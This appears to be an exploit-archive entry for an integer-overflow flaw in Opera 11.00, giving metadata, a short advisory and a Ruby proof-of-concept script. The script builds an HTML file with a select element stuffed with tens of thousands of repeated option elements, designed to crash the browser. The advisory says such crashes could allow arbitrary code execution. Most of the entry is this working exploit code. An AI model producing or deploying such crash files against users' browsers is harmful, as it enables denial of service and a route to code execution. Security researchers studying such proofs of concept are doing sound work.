Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow
Author: C4SS!0 G0M3S
type: remote
platform: multiple
port:
date_added: 2011-01-25
date_updated: 2014-11-18
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/46003/info
Opera Web Browser is prone to a remote integer-overflow vulnerability.
Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.
Opera 11.00 is vulnerable; other versions may also be affected.
print "[*]Creating the Exploit\n"
i = 0
buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
while i<0x4141
buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
i+=1
end
HTML =
"<html>\n"+
"<body>\n\n"+
"<select>\n\n"
HTML+=buf * 100
HTML += "\n\n\n\</select>\n\n"+
"</body>\n\n\n"+
"</html>\n\n\n\n\n"
f = File.open("Exploit_opera_11.00.html","w")
f.puts HTML
f.close
puts "\n\n\[*]File Created With Sucess"
sleep(1)
puts "[*]Go to my Site www.invasao.com.br!"
sleep(1)